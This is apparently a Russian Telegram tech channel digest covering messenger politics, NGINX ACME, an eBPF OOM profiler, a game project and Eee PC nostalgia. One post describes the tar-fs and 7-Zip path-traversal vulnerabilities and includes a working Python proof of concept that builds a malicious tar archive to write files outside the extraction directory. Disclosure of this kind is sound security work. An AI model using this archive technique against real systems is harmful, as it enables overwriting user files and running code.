Люди массово возвращаются к MP3-плеерам. Оказалось, что старая техника выгоднее подписок. В плеер с памятью 64 ГБ помещается до 12 тысяч песен — без рекламы и без ежегодных платежей. Для сравнения, премиум на Spotify стоит около 100 долларов в год, а плеер можно купить заметно дешевле.

Оригинал новости
Music fans ditch 'expensive' subscriptions like Spotify for nostalgic 90s players that cost less than £20
https://www.dailymail.co.uk/femail/article-14989779/music-fans-ditch-expensive-spotify-mp3-players.html

Ваш покорный слуга никогда не пользовался платными облачными сервисами типа Spotify или Яндекс.Музыки и всю жизнь живёт с физическими плеерами. Сначала жил с кассетными, а потом и с mp3.

Собственно, на фото плеер который у меня сейчас. Чего и вам желаю 🌝

4:19

Google Meet — приложение для звонков и видеовстреч — заняло второе место в списке самых скачиваемых бесплатных приложений для общения в российском App Store, убедился корреспондент ТАСС. Первое место занимает мессенджер Max.

https://xn--r1a.website/tass_agency/330835

4:20

Мошенники продолжают совершенствовать схемы обмана, а также создавать новые. Например, мы уже видим, схемы, связанные с мессенджером MAX. Сейчас это единичные случаи, но это говорит о том, что мошенники уже тестируют различные гипотезы, которые в последствии могут использовать массово

https://moskva.mts.ru/about/media-centr/soobshheniya-kompanii/novosti-mts-v-rossii-i-mire/2025-08-08/analitika-servisa-zashhitnik-mts-15-mlrd-moshennicheskih-zvonkov-bylo-zablokirovano-v-pervom-polugodii-2025-goda

4:21

Россиянам стоит быть осторожнее при выборе мессенджеров после частичного ограничения Роскомнадзором звонков в Telegram и WhatsApp*. Об этом «Абзацу» заявил зампред комитета Госдумы по информационной политике, технологиям и связи Олег Матвейчев.

«В Евросоюзе официально имеют право прослушивать и записывать любого человека, для этого даже не нужно возбуждения уголовного дела. Естественно, Google все эти нормы выполняет. Я бы предостерег россиян, которые не хотят, чтобы все их разговоры были подслушаны, обработаны, потом проданы и использованы в разных мошеннических или других противоправных действиях, пользоваться Google Meet», – сказал парламентарий.

https://absatz.media/news/130235-v-gosdume-predosteregli-rossiyan-ot-perehoda-v-google-meet-posle-ogranichenij-v-telegram-i-whatsapp

Ох уж эти европейцы. Спасибо парламентарию.

Четверг, а значит время проектов от подписчиков! 🌝

Тем, кто пропустил, что такое четверговые проекты от подписчиков, можно прочитать тут - https://xn--r1a.website/tech_b0lt_Genona/4983


Слово автору @dendorded

---

Всем привет!
Я занимаюсь разработкой 2D игры-симулятора, где можно создавать биологические организмы и наблюдать за их эволюцией, взаимодействием и выживанием.

Этот проект может помочь людям на практике понять основы нейронных сетей, он позволяет изучать и экспериментировать с основами биологии и эволюции. Игра демонстрирует, как работает генетический алгоритм.

На данный момент в проекте реализовано:
- Редактор генома, позволяющий проектировать рост организма от одной клетки до сложного многоклеточного существа с собственным поведением и нервной системой.
- 15 типов клеток: лист, жир, кость, жгутик, нейрон, мышца, разные сенсоры, клетки вырабатывающая и поглощающая глюкозу, клетка глаз и т.д.
- Процедурная генерация мира.
- Достаточно оптимизированная физика: 500 тысяч клеток при 30 UPS на AMD Ryzen 7 5700G.

В дальнейших планах - внедрить онтогенез для более естественного развития организмов, добавить гидродинамику для плавающих существ, развить процессы эволюции и повысить производительность физического движка (уже есть идея, которая позволит удвоить скорость работы), добавить новые типы клеток, клетки для пищеварительной системы, клетки выделяющие морфоген для регуляции онтогенеза, клетка-линза для создания полноценного глаза и т.д. Также хочу поработать над графикой и рисовать красивые клетки.

Если интересно следить за процессом разработки, присоединяйся к Telegram-каналу: https://xn--r1a.website/genomeia

---

Извините, что последние дни так много про мессенджеры, но очень хочется рассказать про безопасность мессенджера MAX

В июле текущего года заблокировано более десяти тысяч телефонных номеров мошенников, которые чаще всего предпринимали попытки выдать себя за сотрудников банков, правоохранительных органов или государственных сервисов. Удалено более 32 тысяч вредоносных и спам-документов до нанесения ущерба пользователям", — говорится в релизе.

Аккаунты, которые уличили в мошеннических действий на платформе, блокируют пожизненно, а информацию передают в Минцифры. Специалисты центра безопасности мессенджера используют автоматизированные технические системы и отслеживают обращения пользователей в круглосуточном режиме.

https://ria.ru/20250814/max-2035208765.html

ЗЫ

> Аккаунты, которые уличили в мошеннических действий на платформе, блокируют пожизненно

Интересно, что будет когда кто-то захочет зарегистрироваться с номером, который достался от заблокированного пожизненно аккаунта

Наконец-то 🌝

We are very excited to announce the preview release of ACME support in NGINX. The implementation introduces a new module ngx_http_acme_module that provides built-in directives for requesting, installing, and renewing certificates directly from NGINX configuration. The ACME support leverages our NGINX-Rust SDK and is available as a Rust-based dynamic module for both NGINX Open Source users as well as enterprise NGINX One customers using NGINX Plus.

acme_issuer letsencrypt { 
    uri         https://acme-v02.api.letsencrypt.org/directory; 
    # contact   admin@example.test; 
    state_path  /var/cache/nginx/acme-letsencrypt; 

    accept_terms_of_service; 
}

server { 

    listen 443 ssl; 

    server_name  .example.com; 

    acme_certificate letsencrypt; 

    ssl_certificate       $acme_certificate; 
    ssl_certificate_key   $acme_certificate_key; 
    ssl_certificate_cache max=2; 
}

NGINX Introduces Native Support for ACME Protocol
https://blog.nginx.org/blog/native-support-for-acme-protocol

You're a busy professional so the TLDR is we built an OOM monitoring system called OOMProf in eBPF that profiles Go programs at the point they are OOM kill'd capturing allocations up to the bitter end to give developers a better idea of exactly what went wrong.

Запилили профайлер на eBPF для того что бы лучше понимать откуда в Go-шных программах память течёт.

В статье расписана проблематика OOM и к какому решению в итоге пришли. Я расписывать не буду, потому что это всё сложно уместить в пост в Телеге. Оставлю тут ещё только куда ещё хотят развиваться

Future Plans

Rome wasn't built in a day! We'd like to add support for these features:

- Add support for jemalloc,tcmalloc,mimalloc profiling for Rust/native programs
- Add support for stack/goroutine dumps, if we fail or can't gather a memory profile it would nice to have something!

OOMProf - Profiling on the Brink
https://www.polarsignals.com/blog/posts/2025/08/13/oomprof

GitHub проекта

OOMProf is an eBPF-based process monitor that automatically captures heap profiles from Go programs just before they are killed by the Linux Out-of-Memory (OOM) killer, or on-demand for specific processes. This enables post-mortem analysis of memory usage patterns that led to OOM conditions.

eBPF OOM Memory Profiler
https://github.com/parca-dev/oomprof

Ищем Linux мастера для нового Flipper One

Мы делаем новый Flipper One — это ARM-компьютер на Linux на базе процессора RK3576. Мы хотим слепить для него свой кастомный дистрибутив.

Мы не хотим использовать устаревшие системны обновления вроде Debian APT.

Почему классическая система обновлений APT нам не подходит:

• Обновление легко может сломаться на середине и система станет не консистентна

• Нельзя откатиться к предыдущей версии

• Нельзя сбросить настройки в дефолтные

Поэтому мы ищем спеца по Linux дистрибутивам, который спроектирует дистрибутив для Flipper One на основе модной модели с A/B-разделами, read-only корневым разделом и атомарными обновлениями.

Хотим использовать наработки существующих проектов, типа SteamOS, OSTree, RAUC и т.д.

Для пользовательских приложений хотим пакетирование типа — Flatpak, AppImage или Snap или подобного.

Если вы умеете такое, приходите к нам — https://flipperdevices.com/jobs

https://xn--r1a.website/zhovner_hub/2165

Открытка @itpgchannel 🌝

Мой Eee PC 701-ый пал в неравной битве с разлитым стаканом воды, но я его до сих пор нежно люблю. Каких только пыток разными линупсами он не испытал на себе 🌝

Мой экземпляр был из самой-самой-самой первой партии, которая попала в РФ, я его перекупил практически сразу как только узнал, что стал доступен. Всегда и везде со мной и реально выручал в дороге, когда надо было что-то поделать.

Вообще, Eee PC это некая веха в истории ноутбокостроения. И 701, и 900/901 много шума наделали.

Автор поста так и не написал толком "зачем", но режим "Ностальгия" включил

Eee PC 701 в 2025 году: зачем я снова включил этот древний нетбук
https://habr.com/ru/articles/937914/

Артефакт переломной эпохи

701 — это поворотный момент. До него ноутбуки были либо тяжёлыми «кирпичами», либо дорогими ультрабуками. С его выхода началась эра нетбуков, а с ней — массовая доступность компьютеров.
Он показал: ПК может быть дешёвым, маленьким, надёжным — и всё ещё настоящим ПК.

Для своей эпохи он был тем, чем Raspberry Pi стал чуть позже — точкой входа. Именно с него многие начинали:

- Устанавливать альтернативные ОС;

- Копаться в BIOS;

- Читать англоязычные форумы в поисках драйверов и хаков;

- Впервые понимать, что "root" — это не только растение.

Дизайн, в котором всё было по делу

Он не пытался быть красивым. Он пытался быть полезным.
И именно поэтому — он красив. Его клавиатура, пусть и тесная, была удобной. Экран хоть и крошечный, но чёткий.
Разъёмы? VGA, USB, Ethernet, картридер — всё в наличии, даже сегодня многим такого набора не хватает.

Крышка с логотипом ASUS, этот характерный скос у экрана, индикаторы снизу — всё в нём кричит:

«Я — 2007. Но я пришёл всерьёз и надолго».

Инженерная откровенность

Открутить пару винтов — и ты уже внутри. Хочешь добавить модуль Wi-Fi? Пожалуйста.
Хочешь модифицировать SSD, впаять SD-to-SATA переходник, или даже прикрутить второй экран через USB — всё возможно. Это настоящий LEGO-компьютер, и в этом его шарм.

Современные устройства часто «залиты клеем» в прямом и переносном смысле.
701 — был честным. Он не прятал от тебя свои кишки. Он был твоим.

Нашёл на Хабре постов из серии "Как оно было"

> 21 сен 2007
Ноутбук за $200 поступил в пред-продажу
https://habr.com/ru/articles/14328/

> 27 фев 2008
мой взгляд на использование Asus Eee Pc
https://habr.com/ru/articles/20906/

> 6 авг 2009
NetBookFox — сборка Firefox для нетбуков
https://habr.com/ru/articles/66424/

> 30 мая 2010
HDD mod EEE PC 701
https://habr.com/ru/articles/94934/

> 6 фев 2012
Модификация SSD Asus Eee PC 900 и интеграция USB 3G Huawei E150
https://habr.com/ru/articles/137669/

Old but gold

Please change "allopenissues" in JIRA's URL scheme to, e.g. "all-open-issues".
I'm afraid that all we see currently is "blah-penis-blah".

https://jira.atlassian.com/browse/JRASERVER-65811

Сегодня активно форсят ссылку везде с "анализом приложения MAX"

MAX-deep-analysis-of-the-messenger
https://github.com/ZolManStaff/MAX-deep-analysis-of-the-messenger

Я видел этот разбор ещё недели три назад наверное и не стал постить потому что там обсуждать нечего. Этот "анализ" подтверждает, что в целом MAX ничем не отличается от Telegram или Whatsapp по своим запросам.

Если автор(ы) хотят показать что-то ТАКОЕ, то им придётся провести более глубокий анализ с деобфускацией.

Вот ссылки на пермиссии, которые запрашивают Telegram или Whatsapp

https://reports.exodus-privacy.eu.org/en/reports/org.telegram.messenger/latest/

https://reports.exodus-privacy.eu.org/en/reports/com.whatsapp/latest/

Извините, день сегодня такой тяжёлый. Понедельник!

> 20 июл. 2025
> ИА "Панорама"

Все SMS-коды теперь будут приходить только в национальный мессенджер МАХ
https://panorama.pub/news/vse-sms-kody-teper-budut

> 18 августа 2025
> первый зампред комитета Госдумы по информполитике Александр Ющенко

«Если полноценно запускать мессенджер, он должен соответствовать всем возможным технологическим возможностям, которые есть на рынке, для того чтобы быть конкурентоспособным. У него должен быть практически весь функционал, в том числе и информационные каналы, и возможность взаимодействия с разными сервисами. Поэтому работа над тем, чтобы в Max приходили коды верификации, должна идти. Она уже ведется, я думаю, и надо быть уверенным, что данная функция будет представлена», – отметил Ющенко.

В Госдуме заявили, что все коды верификации должны отправляться в Max
https://absatz.media/news/130801-v-gosdume-zayavili-chto-vse-kody-verifikacii-dolzhny-otpravlyatsya-v-max

Спасибо

Уязвимости в tar-fs и 7-Zip, позволяющие записать файлы за пределы базового каталога
https://www.opennet.ru/opennews/art.shtml?num=63740

В NPM-пакете tar-fs выявлена уязвимость (CVE-2025-48387), позволяющая при распаковке специально оформленного tar-архива записать файлы в любые части ФС, не ограниченные каталогом, в который осуществляется распаковка (насколько позволяют права доступа текущего пользователя). Уязвимость также может использоваться для перезаписи существующих файлов, например, для организации выполнения своего кода в системе могут быть переписаны файлы ".ssh/id_rsa" или ".bashrc" в домашнем каталоге пользователя.

Проблеме присвоен критический уровень опасности c учётом того, что пакет tar-fs имеет 23 миллиона загрузок в неделю и используется как зависимость в 1155 проектах. Уязвимость устранена в выпусках 3.0.9, 2.1.3 и 1.16.5, которые были сформированы в мае, но информация об уязвимости раскрыта лишь спустя почти 3 месяца.

Уязвимость вызвана недостаточными проверками имеющихся в архиве символических и жёстких ссылок на предмет их выхода за пределы целевого каталога для распаковки. Для обхода проверок применяются две символические ссылки: первая указывает на корневой каталог распаковки архива ("."), а вторая создаётся относительно первой символической ссылки и использует в имени символы "../" для выхода за пределы базового каталога. Например, первая ссылка "noop/noop/noop" указывает на ".", а вторая "noop/noop/noop/../../../" раскрывается как "./../../../". Для организации перезаписи файлов в архиве может быть создана жёсткая ссылка, ссылающаяся на внешний файл относительно второй символической ссылки.

Похожая уязвимость (CVE-2025-55188) выявлена в архиваторе 7-Zip. Для записи файлов вне базового каталога в 7-Zip также могут использоваться символические ссылки, имеющие последовательность "../" в файловом пути. Проблема может быть эксплуатирована при распаковке при помощи 7-Zip любых архивов, поддерживающих символические ссылки, например, zip, tar, 7z и rar

PoC

import tarfile
import io
with tarfile.open("poc.tar", mode="x") as tar:
    root = tarfile.TarInfo("root")
    root.linkname = ("noop/" * 15) + ("../" * 15)
    root.type = tarfile.SYMTYPE
    tar.addfile(root)
    noop = tarfile.TarInfo("noop")
    noop.linkname = "."
    noop.type = tarfile.SYMTYPE
    tar.addfile(noop)
    hard = tarfile.TarInfo("hardflag")
    hard.linkname = "root/home/username/flag/flag"
    hard.type = tarfile.LNKTYPE
    tar.addfile(hard)
    content = b"overwrite\n"
    overwrite = tarfile.TarInfo("hardflag")
    overwrite.size = len(content)
    overwrite.type = tarfile.REGTYPE
    tar.addfile(overwrite, fileobj=io.BytesIO(content))
    content = b"new!\n"
    newfile = tarfile.TarInfo("root/home/username/flag/newfile")
    newfile.size = len(content)
    newfile.type = tarfile.REGTYPE
    tar.addfile(newfile, fileobj=io.BytesIO(content))

> Стабилизированы команды "git switch" и "git restore", которые с 2019 года рассматривались как экспериментальные. Команды преподносятся как современные эквиваленты "git checkout", разделяющие такие малосвязанные возможности данной команды, как манипуляция ветками (переключение и создание) и восстановление файлов в рабочем каталоге.

Перешёл на использование этих команд как только они были добавлены. Ни о чём не жалею 🌝

Выпуск системы управления исходными текстами Git 2.51
https://www.opennet.ru/opennews/art.shtml?num=63742

Оригинал
https://lore.kernel.org/lkml/xmqqikikk1hr.fsf@gitster.g/